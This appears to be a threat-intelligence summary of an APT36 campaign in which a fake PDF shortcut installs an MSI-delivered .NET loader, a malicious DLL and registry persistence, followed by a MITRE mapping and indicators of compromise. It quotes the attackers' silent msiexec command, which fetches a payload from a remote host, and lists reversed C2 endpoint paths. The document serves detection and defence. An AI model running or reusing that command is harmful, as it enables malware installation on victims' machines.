Threat Research

APT36 LNK-BASED MALWARE CAMPAIGN LEVERAGING MSI PAYLOAD DELIVERY

Cyfirma
APT36 LNK-BASED MALWARE CAMPAIGN LEVERAGING MSI PAYLOAD DELIVERY

CYFIRMA analyzed a targeted APT-36 campaign that used a malicious Windows shortcut masquerading as a government advisory PDF to retrieve an MSI installer which deployed a .NET loader, malicious DLLs (including wininet.dll), dropped a decoy PDF, and established registry-run persistence via an HTA. Although the C2 domain wmiprovider[.]com was inactive during analysis, the loader contains obfuscated HTTP endpoints that enable remote command execution and long-term access. #APT36 #NCERT_Whatsapp_Advisory

Keypoints

  • Initial access was achieved via a malicious Windows shortcut (NCERT-Whatsapp-Advisory.pdf.lnk) disguised as a PDF to trick users into execution.
  • The shortcut runs an obfuscated cmd.exe/msiexec command to download and install an MSI payload hosted on aeroclubofindia.co.in.
  • The MSI contains a .NET loader (ConsoleApp1.exe) that drops a decoy PDF, malicious DLLs (including wininet.dll), and additional executables to C:ProgramData.
  • Persistence is implemented by creating PcDirvs.hta which uses embedded VBScript to add PcDirvs.exe to the Windows Run registry key for startup execution.
  • The malicious wininet.dll contains hardcoded C2 domain (wmiprovider[.]com) and implements reversed, obfuscated HTTP GET endpoints (/retsiger, /taebtraeh, /dnammoc_teg, /dnammocmvitna) for beaconing and remote command retrieval.
  • The malware performs system and security reconnaissance (antivirus and anti-VM checks) and supports arbitrary remote command execution via cmd.exe, enabling follow-on payloads and long-term control.

MITRE Techniques

  • [T1566.001 ] Phishing: Spear phishing Attachment – Used to deliver a malicious .lnk file disguised as a PDF to initiate infection (‘Uses deceptive shortcut (.lnk) files masquerading as legitimate PDF advisories to trick victims into executing malicious code.’).
  • [T1059.001 ] Command and Scripting Interpreter: PowerShell – Listed as an execution technique in the report and the campaign uses command interpreters to run obfuscated commands (relevant execution example: ‘C:WindowsSystem32cmd.exe /c msiexec.exe /q /i https[:]//aeroclubofindia[.]co[.]in/css/NCERT-Whatsapp-Advisory/winc’).
  • [T1547.001 ] Registry Run Keys / Startup Folder – Persistence achieved by HTA-created VBScript that adds PcDirvs.exe to the Windows Run registry key (‘creates a malicious PcDirvs.hta file containing an embedded VBScript that adds PcDirvs.exe to the Windows Run registry key’).
  • [T1027 ] Obfuscated Files or Information – Obfuscation used across the campaign to evade detection, including caret insertion and reversed endpoint strings (’employs command-line obfuscation and encoded MSI-based delivery to evade casual inspection and static detection.’).
  • [T1027.002 ] Software Packing – Payloads are embedded within the MSI and delivered as packaged components (‘The MSI file contains embedded components, ConsoleApp1.exe, along with a DLL file.’).
  • [T1027.009 ] Embedded Payloads – MSI contains embedded executables and DLLs decoded at runtime (‘The MSI file contains embedded components, ConsoleApp1.exe, along with a DLL file.’).
  • [T1564.003 ] Hidden Window – Execution and launcher operate in hidden mode to reduce visibility (‘The shortcut executes an obfuscated command using cmd.exe in hidden mode.’ / ‘The HTA is launched with windowsStyle.Hidden’).
  • [T1574.001 ] Hijack Execution Flow: DLL – DLL hijacking used to intercept execution flow via a malicious wininet.dll (‘Deploys a malicious wininet.dll to intercept execution flow and establish command-and-control functionality.’).
  • [T1087 ] Account Discovery – The malware conducts reconnaissance of the victim environment, consistent with account and environment discovery (‘System and Security Reconnaissance: Collects information about the victim environment, including installed antivirus products and anti-VM status.’).
  • [T1217 ] Browser Information Discovery – Listed in the mapping as a reconnaissance capability to gather environment details (‘Browser Information Discovery’).
  • [T1083 ] File and Directory Discovery – The loader drops and enumerates files and directories to place payloads in ProgramData and other locations (‘decodes and writes a DLL file to: C:ProgramDataPcDirvspdf.dll’).
  • [T1082 ] System Information Discovery – The malware collects system-level details and AV/anti-VM status to inform behavior (‘Collects information about the victim environment, including installed antivirus products and anti-VM status.’).
  • [T1005 ] Data from Local System – The toolkit supports collection of local system data for exfiltration or reconnaissance (‘Collects information about the victim environment…’ and drops/reads local files such as the decoy PDF and dropped executables).’
  • [T1071.004 ] Application Layer Protocol: DNS – Mapped in the report as a C2 channel technique while the DLL actually implements obfuscated HTTP GET–based endpoints to communicate with C2 (‘The DLL implements multiple HTTP GET–based endpoints to establish communication with the C2 server…’).
  • [T1041 ] Exfiltration Over C2 Channel – The C2 mechanism supports retrieval of commands and could be used for exfiltration over the established channel (‘Retrieves attacker-issued commands from the server and executes them via: “cmd.exe /c “, enabling the threat actor to remotely run arbitrary commands…’).
  • [T1485 ] Data Destruction – Listed as an impact technique in the report’s MITRE mapping (report lists ‘Data Destruction’ as an impact mapping).

Indicators of Compromise

  • [URL ] MSI downloader – https[:]//aeroclubofindia[.]co[.]in/css/NCERT-Whatsapp-Advisory/winc
  • [Domain ] C2 and hosting – wmiprovider[.]com (hardcoded C2 in wininet.dll), aeroclubofindia[.]co[.]in (MSI host)
  • [SHA256 ] File hashes observed – bbcbce9a08d971a4bbcd9a0af3576f1e0aa0dad1b3cf281c139b7a8dd8147605 (NCERT-Whatsapp-Advisory.pdf.lnk), 4dd9e2085297515825416415413eae1c9632392cb159ac70e459d0ebeb2dd49d (wininet.dll), and 3 more hashes.
  • [File Name ] Dropped and decoy files – NCERT-Whatsapp-Advisory.pdf.lnk, NCERT-Whatsapp-Advisory.pdf, and other names including PcDirvs.hta and nikmights.msi.
  • [HTA/Script ] Persistence artifact – PcDirvs.hta (HTA with embedded VBScript used to add PcDirvs.exe to Run registry key).
  • [HTTP Endpoints ] Obfuscated C2 paths (reversed) – /retsiger (register), /taebtraeh (heartbeat), /dnammoc_teg (get_command) used by the DLL for communication and command retrieval.
  • [Strings / Identifiers ] Hardcoded unique strings observed – ffce827bd99b5e68fc04103f06ce489458, nnb5dc76007c20b4ea51f14290262d1 (used as embedded identifiers/UIDs in payloads).

Read more: https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/